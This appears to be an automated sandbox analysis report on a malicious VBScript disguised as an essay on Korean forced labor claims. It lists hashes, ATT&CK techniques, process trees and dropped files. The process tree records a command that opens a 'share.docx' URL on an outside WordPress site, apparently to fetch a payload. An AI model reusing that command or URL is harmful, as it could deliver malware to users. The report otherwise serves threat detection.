ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf

Resubmissions

20/04/2024, 06:42

240420-hgtw9sbe31 8

20/04/2024, 06:23

240420-g5gfeabc2y 8

Analysis

max time kernel
259s
max time network
289s
platform
windows10-2004_x64
resource
win10v2004-20240412-en
resource tags

arch:x64arch:x86image:win10v2004-20240412-enlocale:en-usos:windows10-2004-x64system
submitted
20/04/2024, 06:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Essay on Resolution of Korean Forced Labor Claims.vbs
Size

27KB
MD5

75ec9f68a5b62705c115db5119a78134
SHA1

6209f948992fd18d4fc6fc6f89d9815369ac8931
SHA256

ec9cc1940fe395867f5bab06016920f7194d753ae8cfa331bea0a44ecc8ef7cf
SHA512

82a0d96640390b8ffdcecd34fc1ae1663c84a299448a5af02b24bf9b9e1fdd19954ceeeea555808a57fcdc452b2b6e598338f11bb0c7101b34934a8ec7bf1780
SSDEEP

384:mrquVS33hr8nIsbSQVwooRmB7+shi14PdSkNk0dRL3K2fJ+QIHBR:mugSBrwIBQVwoI8dSMdBa2fGj

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
35	4320	WScript.exe
40	4320	WScript.exe
57	4320	WScript.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-259785868-298165991-4178590326-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
4204	msedge.exe
4204	msedge.exe
3884	msedge.exe
3884	msedge.exe
2400	identity_helper.exe
2400	identity_helper.exe
700	msedge.exe
700	msedge.exe
700	msedge.exe
700	msedge.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe
3884	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4320 wrote to memory of 3376	4320	WScript.exe	90
PID 4320 wrote to memory of 3376	4320	WScript.exe	90
PID 3376 wrote to memory of 2400	3376	cmd.exe	92
PID 3376 wrote to memory of 2400	3376	cmd.exe	92
PID 3084 wrote to memory of 3884	3084	explorer.exe	94
PID 3084 wrote to memory of 3884	3084	explorer.exe	94
PID 3884 wrote to memory of 3920	3884	msedge.exe	96
PID 3884 wrote to memory of 3920	3884	msedge.exe	96
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 380	3884	msedge.exe	98
PID 3884 wrote to memory of 4204	3884	msedge.exe	99
PID 3884 wrote to memory of 4204	3884	msedge.exe	99
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100
PID 3884 wrote to memory of 4012	3884	msedge.exe	100

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Essay on Resolution of Korean Forced Labor Claims.vbs"
1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3376
- - C:\Windows\explorer.exe
    explorer "https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx"
    3⤵
    PID:2400

C:\Windows\explorer.exe
C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
1⤵
- Suspicious use of WriteProcessMemory
PID:3084
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://makeoversalon.net.in/wp-content/plugins/wp-custom-taxonomy-image/iiri/share.docx
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:3884
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffd10d446f8,0x7ffd10d44708,0x7ffd10d44718
    3⤵
    PID:3920
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2040 /prefetch:2
    3⤵
    PID:380
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2140 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:4204
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2928 /prefetch:8
    3⤵
    PID:4012
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1
    3⤵
    PID:3040
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:1
    3⤵
    PID:736
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
    3⤵
    PID:3260
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5268 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2400
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
    3⤵
    PID:556
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5352 /prefetch:1
    3⤵
    PID:3888
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4756 /prefetch:1
    3⤵
    PID:1292
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3880 /prefetch:1
    3⤵
    PID:4008
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2024,2680705665382739579,17287230648230566958,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4856 /prefetch:2
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:700

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:2996

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3968

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d94406b964753cc5222ab1343f54bb1

SHA1
a5e7de0781fa1fabb3cd89564f2e5693cb4dee16

SHA256
fd9923a217cd8d2c44a63dbfe52ec262e7c80b1f1e50c6e0f21f8379c90e7762

SHA512
1ad2c144e7bbd809f400f8782586d3768fc82bcef39db986f766897c344efec77ab2c0b6d9c5ee2019ef5cf9ad0c46bdd25392cbc9dbf9ea80e800577f0fc598

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
49dde89f025a1cce8848473379f7c28f

SHA1
b405956b33146b2890530e818b6aa74bba3afb88

SHA256
d6d125ba686b825bb22ab967a346051780cab1f55fc68a2f3efdf3fb5598f96b

SHA512
53050344674d8886db66e25f42d97bf46b26229972631f857286c2a303897cda58d85ee8ca768bbfb1fc07e52567315ea85d57e39b5b382916700ec389946506

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
499B

MD5
e95520708877b213ed99c2e08c1a9db1

SHA1
8948fe9ec9ecbe46b0e1856d125a59ad4bbfe640

SHA256
7c527b497f9fb3e4db82462d5e7a1e495366e9f1183a708c9569ce42650fc691

SHA512
5440c1f849ae1d5bfe2c83ff186928713a6ed040aebdf0405e4c7f981504705647c93a030ec44bc5a9d2755ae746a77c28661347fbf97a8c64dad32d3a775b08

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
fcb85e39a754275e9bf8106eeb88ac58

SHA1
ce7ba308508a286f36c184de01917041c9e8b347

SHA256
9391a2126133e9d177c4435056bb2884ba33f1530ee114a492658537beb1cf59

SHA512
1638400d339f837f20ffb566026bb07a54f328ea3b3360dc0726893e558f32bc566ecce6b6373255635dca38dc48ea8cc48f7fe91f61b695e0df6a58c84050dd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5e964781288614f24d4f3986ac1f2f63

SHA1
28b26b06b747678bd22d9199eea36dda3e058838

SHA256
d69223524f274d22b263b28c2510efb6c2bd796df7e3befb7f085545d1d59ad4

SHA512
d5cf315cbd0b549eb069f1d077bf895122ec200a55a2f59be074002b6a745f31978ac3569c09a41634338a8ca97da0f275cf43deee8f3d78914394975c1853d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
7c43199d1e5acf5a31e1cbef990fbc47

SHA1
df7bd524b9b3175325c0aff3469ea7f2211d3061

SHA256
52a6fd2a2fff53c738c77a6385e7e1677f8990781699f78c63d5a4b0fe566d22

SHA512
aae886642b40ffb0676534fd85abe43ab588526b8e952b12a1bcafc73cb05103c76aee4fa32cc18c74af6c59aa1dc84bcda09ebccb7d11adc79fee3bfc93e2d1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
11KB

MD5
fa8f393f2823c003ed490927aead9096

SHA1
2f383373340e23408bab0a62cd0ae88b62fb6abf

SHA256
58d6bdfa5e8130e44ff8217db783456296041c832f34f44ad83dfc8783aa1ff2

SHA512
59995106fbafee26d9a46d7ff28c8c06a18862ea3e8886ce3505fdd7d6ade9938980dd9d4264876a41c6a7de673b9fd9bd80c1da56e3306753077726da262a06

Download Submit